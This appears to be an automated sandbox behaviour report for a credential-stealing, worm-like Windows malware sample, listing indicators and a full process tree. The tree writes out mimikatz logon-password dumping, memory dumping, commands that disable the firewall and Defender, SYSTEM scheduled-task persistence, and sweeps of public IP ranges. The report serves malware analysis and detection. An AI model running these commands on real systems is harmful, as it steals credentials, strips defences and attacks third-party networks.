Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	bshigespg.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	tpefvts.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	tpefvts.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	tpefvts.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4368	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
4532	380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	4532	380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe
Token: SeDebugPrivilege	2796	tpefvts.exe
Token: SeDebugPrivilege	3428	tpefvts.exe
Token: SeDebugPrivilege	2428	vfshost.exe
Token: SeDebugPrivilege	3724	bshigespg.exe
Token: SeLockMemoryPrivilege	4468	ffieug.exe
Token: SeLockMemoryPrivilege	4468	ffieug.exe
Token: SeDebugPrivilege	3264	bshigespg.exe
Token: SeDebugPrivilege	764	bshigespg.exe
Token: SeDebugPrivilege	2276	bshigespg.exe
Token: SeDebugPrivilege	4968	bshigespg.exe
Token: SeDebugPrivilege	4884	bshigespg.exe
Token: SeDebugPrivilege	1752	bshigespg.exe
Token: SeDebugPrivilege	2656	bshigespg.exe
Token: SeDebugPrivilege	2828	bshigespg.exe
Token: SeDebugPrivilege	4064	bshigespg.exe
Token: SeDebugPrivilege	1124	bshigespg.exe
Token: SeDebugPrivilege	3620	bshigespg.exe
Token: SeDebugPrivilege	2868	bshigespg.exe
Token: SeDebugPrivilege	2720	bshigespg.exe
Token: SeDebugPrivilege	2200	bshigespg.exe
Token: SeDebugPrivilege	3600	bshigespg.exe
Token: SeDebugPrivilege	1412	bshigespg.exe
Token: SeDebugPrivilege	1164	bshigespg.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
4532	380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe
4532	380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe
2796	tpefvts.exe
2796	tpefvts.exe
3428	tpefvts.exe
3428	tpefvts.exe
3956	xohudmc.exe
3316	cuwouc.exe
4220	tpefvts.exe
4220	tpefvts.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4532 wrote to memory of 2016	4532	380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe	85
PID 4532 wrote to memory of 2016	4532	380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe	85
PID 4532 wrote to memory of 2016	4532	380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe	85
PID 2016 wrote to memory of 4368	2016	cmd.exe	87
PID 2016 wrote to memory of 4368	2016	cmd.exe	87
PID 2016 wrote to memory of 4368	2016	cmd.exe	87
PID 2016 wrote to memory of 2796	2016	cmd.exe	95
PID 2016 wrote to memory of 2796	2016	cmd.exe	95
PID 2016 wrote to memory of 2796	2016	cmd.exe	95
PID 3428 wrote to memory of 5048	3428	tpefvts.exe	99
PID 3428 wrote to memory of 5048	3428	tpefvts.exe	99
PID 3428 wrote to memory of 5048	3428	tpefvts.exe	99
PID 5048 wrote to memory of 1272	5048	cmd.exe	101
PID 5048 wrote to memory of 1272	5048	cmd.exe	101
PID 5048 wrote to memory of 1272	5048	cmd.exe	101
PID 5048 wrote to memory of 4068	5048	cmd.exe	102
PID 5048 wrote to memory of 4068	5048	cmd.exe	102
PID 5048 wrote to memory of 4068	5048	cmd.exe	102
PID 5048 wrote to memory of 4776	5048	cmd.exe	103
PID 5048 wrote to memory of 4776	5048	cmd.exe	103
PID 5048 wrote to memory of 4776	5048	cmd.exe	103
PID 5048 wrote to memory of 4280	5048	cmd.exe	104
PID 5048 wrote to memory of 4280	5048	cmd.exe	104
PID 5048 wrote to memory of 4280	5048	cmd.exe	104
PID 5048 wrote to memory of 4220	5048	cmd.exe	106
PID 5048 wrote to memory of 4220	5048	cmd.exe	106
PID 5048 wrote to memory of 4220	5048	cmd.exe	106
PID 5048 wrote to memory of 1280	5048	cmd.exe	105
PID 5048 wrote to memory of 1280	5048	cmd.exe	105
PID 5048 wrote to memory of 1280	5048	cmd.exe	105
PID 3428 wrote to memory of 4880	3428	tpefvts.exe	107
PID 3428 wrote to memory of 4880	3428	tpefvts.exe	107
PID 3428 wrote to memory of 4880	3428	tpefvts.exe	107
PID 3428 wrote to memory of 4476	3428	tpefvts.exe	109
PID 3428 wrote to memory of 4476	3428	tpefvts.exe	109
PID 3428 wrote to memory of 4476	3428	tpefvts.exe	109
PID 3428 wrote to memory of 2200	3428	tpefvts.exe	111
PID 3428 wrote to memory of 2200	3428	tpefvts.exe	111
PID 3428 wrote to memory of 2200	3428	tpefvts.exe	111
PID 3428 wrote to memory of 4820	3428	tpefvts.exe	117
PID 3428 wrote to memory of 4820	3428	tpefvts.exe	117
PID 3428 wrote to memory of 4820	3428	tpefvts.exe	117
PID 4820 wrote to memory of 1060	4820	cmd.exe	119
PID 4820 wrote to memory of 1060	4820	cmd.exe	119
PID 4820 wrote to memory of 1060	4820	cmd.exe	119
PID 1060 wrote to memory of 2428	1060	wpcap.exe	120
PID 1060 wrote to memory of 2428	1060	wpcap.exe	120
PID 1060 wrote to memory of 2428	1060	wpcap.exe	120
PID 2428 wrote to memory of 4208	2428	net.exe	122
PID 2428 wrote to memory of 4208	2428	net.exe	122
PID 2428 wrote to memory of 4208	2428	net.exe	122
PID 1060 wrote to memory of 696	1060	wpcap.exe	123
PID 1060 wrote to memory of 696	1060	wpcap.exe	123
PID 1060 wrote to memory of 696	1060	wpcap.exe	123
PID 696 wrote to memory of 1904	696	net.exe	125
PID 696 wrote to memory of 1904	696	net.exe	125
PID 696 wrote to memory of 1904	696	net.exe	125
PID 1060 wrote to memory of 2796	1060	wpcap.exe	126
PID 1060 wrote to memory of 2796	1060	wpcap.exe	126
PID 1060 wrote to memory of 2796	1060	wpcap.exe	126
PID 2796 wrote to memory of 4068	2796	net.exe	128
PID 2796 wrote to memory of 4068	2796	net.exe	128
PID 2796 wrote to memory of 4068	2796	net.exe	128
PID 1060 wrote to memory of 2768	1060	wpcap.exe	129

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1692
- C:\Windows\TEMP\avfhdtkbl\ffieug.exe
  "C:\Windows\TEMP\avfhdtkbl\ffieug.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4468

C:\Users\Admin\AppData\Local\Temp\380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe
"C:\Users\Admin\AppData\Local\Temp\380f820dbc3b460dd7198b15b23b9a4c_hacktools_icedid_mimikatz_JC.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\iiyquivu\tpefvts.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:4368
- - C:\Windows\iiyquivu\tpefvts.exe
    C:\Windows\iiyquivu\tpefvts.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2796

C:\Windows\iiyquivu\tpefvts.exe
C:\Windows\iiyquivu\tpefvts.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:4068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4220
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  PID:4880
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  PID:4476
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:2200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\cubjtihin\cgeufuill\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4820
- - C:\Windows\cubjtihin\cgeufuill\wpcap.exe
    C:\Windows\cubjtihin\cgeufuill\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:1060
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2428
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:4208
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:696
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:1904
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2796
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:4068
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:2768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:3032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1972
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:2276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:2576
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1780
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:3556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\cubjtihin\cgeufuill\ahunzksbu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\cubjtihin\cgeufuill\Scant.txt
  2⤵
  PID:5072
- - C:\Windows\cubjtihin\cgeufuill\ahunzksbu.exe
    C:\Windows\cubjtihin\cgeufuill\ahunzksbu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\cubjtihin\cgeufuill\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\cubjtihin\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\cubjtihin\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:4836
- - C:\Windows\cubjtihin\Corporate\vfshost.exe
    C:\Windows\cubjtihin\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uilecjsgu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\iiyquivu\tpefvts.exe /p everyone:F"
  2⤵
  PID:3596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "uilecjsgu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\iiyquivu\tpefvts.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:1404
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  PID:4852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tkghjucnn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\avfhdtkbl\ffieug.exe /p everyone:F"
  2⤵
  PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "tkghjucnn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\avfhdtkbl\ffieug.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:4468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "liyqtjaby" /ru system /tr "cmd /c C:\Windows\ime\tpefvts.exe"
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:696
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "liyqtjaby" /ru system /tr "cmd /c C:\Windows\ime\tpefvts.exe"
    3⤵
    - Creates scheduled task(s)
    PID:764
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  PID:4364
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:1120
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:3680
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  PID:2276
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  PID:4708
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:3976
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 788 C:\Windows\TEMP\cubjtihin\788.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3724
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:4400
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  PID:396
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  PID:4072
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:2484
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:3012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:5088
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:4488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:4752
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:3848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:4220
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:4960
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:232
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:4168
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:1160
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:2172
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:4636
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:4588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:3192
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:2764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:3644
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:4676
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:8
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:1928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:1284
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:2220
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:4628
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 384 C:\Windows\TEMP\cubjtihin\384.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3264
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:3956
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 1692 C:\Windows\TEMP\cubjtihin\1692.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:764
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 2504 C:\Windows\TEMP\cubjtihin\2504.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2276
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 2584 C:\Windows\TEMP\cubjtihin\2584.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4968
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4628
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 2840 C:\Windows\TEMP\cubjtihin\2840.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4884
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 2524 C:\Windows\TEMP\cubjtihin\2524.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 3524 C:\Windows\TEMP\cubjtihin\3524.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 3632 C:\Windows\TEMP\cubjtihin\3632.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2828
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 3700 C:\Windows\TEMP\cubjtihin\3700.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4064
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 3784 C:\Windows\TEMP\cubjtihin\3784.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1124
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 3740 C:\Windows\TEMP\cubjtihin\3740.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3620
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 3812 C:\Windows\TEMP\cubjtihin\3812.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 3532 C:\Windows\TEMP\cubjtihin\3532.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2720
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\cubjtihin\cgeufuill\scan.bat
  2⤵
  PID:2108
- - C:\Windows\cubjtihin\cgeufuill\jkabubcfq.exe
    jkabubcfq.exe TCP 154.61.0.1 154.61.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:640
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 3796 C:\Windows\TEMP\cubjtihin\3796.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 2160 C:\Windows\TEMP\cubjtihin\2160.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3600
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 2108 C:\Windows\TEMP\cubjtihin\2108.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1412
- C:\Windows\TEMP\cubjtihin\bshigespg.exe
  C:\Windows\TEMP\cubjtihin\bshigespg.exe -accepteula -mp 4112 C:\Windows\TEMP\cubjtihin\4112.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:2696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
